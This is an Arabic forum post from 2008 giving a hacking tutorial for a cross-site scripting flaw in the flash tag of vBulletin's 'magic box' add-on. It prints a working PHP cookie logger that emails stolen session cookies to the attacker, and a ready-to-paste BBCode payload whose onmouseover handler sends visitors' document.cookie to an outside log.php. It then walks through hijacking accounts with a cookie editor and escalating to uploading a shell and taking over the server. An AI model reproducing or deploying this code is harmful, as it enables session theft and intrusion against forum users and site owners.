ثغره الصندوق السحري والماسي (الفلاش) بالصور

من طرف **الزعيم** الأحد مارس 16, 2008 4:22 am

السلام عليكم

اليوم بشرح ثغره الصندوق السحري والماسي (الفلاش) اللي اكتشفها اخونا العندليب نظرًا لطلب شرحها

الثغره سهله ومو محتاجه شرح

بسم الله نبدأ

المتطلبات :

1- لوج >>انصح بلوج اخوي ديفلل<< وهو شغال وانا ماجربت غيره واخترقت المنتديات فيه
2- مساحه تسمح بملفات php واللايكوس ينفع وانا شغال على اللايكوس والتبليغ يوصل بثانيه
3- ايميل بمساحه كبيره لانه لو حطيت الفلاش بموضوع ومروا عليه اعضاء اذكياء واركز على اذكياء لانهم يمرون على الفلاش
1000 مره ولو خمس اعضاء يمرون 1000 مره اعتقد ايميلك بينفجر لانه راح توصلك 5000 رساله خخخخخخخخ

الشروط لنجاح الثغره :

1- صندوق سحري او ماسي وتكون خاصيه الفلاش موجوده بس... وللعلم اليوم جربت الثغره على vb3.0.7 واشتغلت

الحين اذا كل هذا توفر ما عليك الا تحط هالاكسبلويت بالرد او بموضوع او بالتوقيع انت وذكائك

وهذا اللوج

اقتباس:

$YourMail = "znj@hotmail.com"; // Your E-mail

$Ip = $REMOTE_ADDR;
$Cooki_e = $_GET['id'];
$NameOfAttack = $_GET['nm'];
$Refresh = $_GET['re'];

$ReplaceCookie1 = array("=",";");
$ReplaceCookie2 = array("[ "," ] ");
$Cooki_e = str_replace($ReplaceCookie1,$ReplaceCookie2,$Cooki _e); // Replace

//
$Hdr = "From: S4aLog $Msg =
"
Mr Attacker ,,, S4aLog v1 Beta <<
[ ".$NameOfAttack." ] ,, Name Of Attack
[ ".$Refresh." ] ,, Refresh Page
[ ".$Ip." ] ,, Ip
[ S4aLog < By Devil-00 > -- Thnx For -- <Yes2Hack> <xxx (hacker)> <s4a Members> ]
[ devil-00@hotmail.co.uk - devil.00@gmail.com ]
-----------------------------------------------
Cookie ::
".$Cooki_e."
";

$Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);

if($Send){
if($Refresh <> ""){header("location:".$Refresh);}
}
?>

وكل اللي عليك تغيره باللوج كله هو الايميل في هالسطر حط ايميلك وبعدها ارفع اللوج

اقتباس:
$YourMail = "znj@hotmail.com"; // Your E-mail

بعد ما نرفع اللوج نروح للمنتدى ونحط هالاكسبلويت برد ولا بموضوع ولا بتوقيع مثل ما ذكرنا
وحسب ماتحب

الاكسبلويت :

اقتباس:
[flash=http://www.xxx.com/hitler.swf]onmouseover='location.href="http: http://www.xxx.com/log.php?nm=al-battar.net&re=http://www.xxx.com/vb&id="+ document·cookie'[/flash]

المتغيرات :
1- http://www.xxx.com/hitler.swf << حط رابط الفلاش مالك
2- http://www.xxx.com/log.php << حط رابط اللوج
3- http://www.xxx.com/vb << حط رابط الصفحه اللي تبي الضحيه يروح لها بعد مرور الماوس على الفلاش

وياليت تنتبه وانت تغير المتغيرات بالكود اي غلط بالكود ماراح تشتغل وياك
الحين اقعد بايميلك وانطر الكوكيز يوصلك ثغره الصندوق السحري والماسي (الفلاش) بالصور Icon_biggrin

وهذي صوره للايميل اللي راح يوصلك وللعلم كل منتدى عن منتدى يفرق الكوكيز
في منتديات مايوصلك وياها frlastactivity وبجذي لما نعدل الكوكيز نحطه نفس frlastvisit
وفي منتديات يوصلونك اثنينهم ولكن نفس الشي حطهم نفس الشي مافي مشاكل وراح تدخل بالعضويه

بعد ما توصلنا معلومات الكوكيز نروح ونخدع الكوكيز
لخداع الكوكيز نحتاج هالبرنامج وهو برنامج cookie editor
وهذي وصله لتحميله كلك يمين وحفظ باسم

الحين لنفرض وصلتنا معلومات الكوكيز واحنا مسجلين بالمنتدى شي اكيد
ونفرض هذي هي المعلومات اللي وصلتنا

كل اللي علينا نفتح كوكيز ايدتور

1- اضغط
2- اكتب اسم الموقع
3- اضغط هنيه بعد ما تكتب الموقع
الحين اللي بالمربع الاحمر هم اسامي المعلومات واللي بالازرق هم المعلومات نفسهم كل اللي عليك
تروح للإيميل وتاخذ المعلومه وتبدلها من البرنامج شلون؟؟
اضغط مرتين على المعلومه بالبرنامج يطلع لك مربع في خانتين الخانه الاولى اسم المعلومه
والثانيه المعلومه نفسها وهي اللي لازم نغيرها بالمعلومه اللي في الايميل

بعدها افتح المنتدى وراح تلقا نفسك بالعضوية صاحبه معلومات الكوكيز اللي بدلناها بمعلوماتنا

والباقي عليك سواء بتخترق المنتدى او غيره والكل عنده طرقه والافضل تحاول تفك تشفير md5
وتدخل لوحه التحكم وترفع شل وتخترق المنتدى فالموقع فالسيرفر

وبالنسبه لطريقه الترقيع هي جعل كلمه cookie من الكلمات المحظورة والممنوعه في المنتدى

اسف لعدم وجود صور للشرح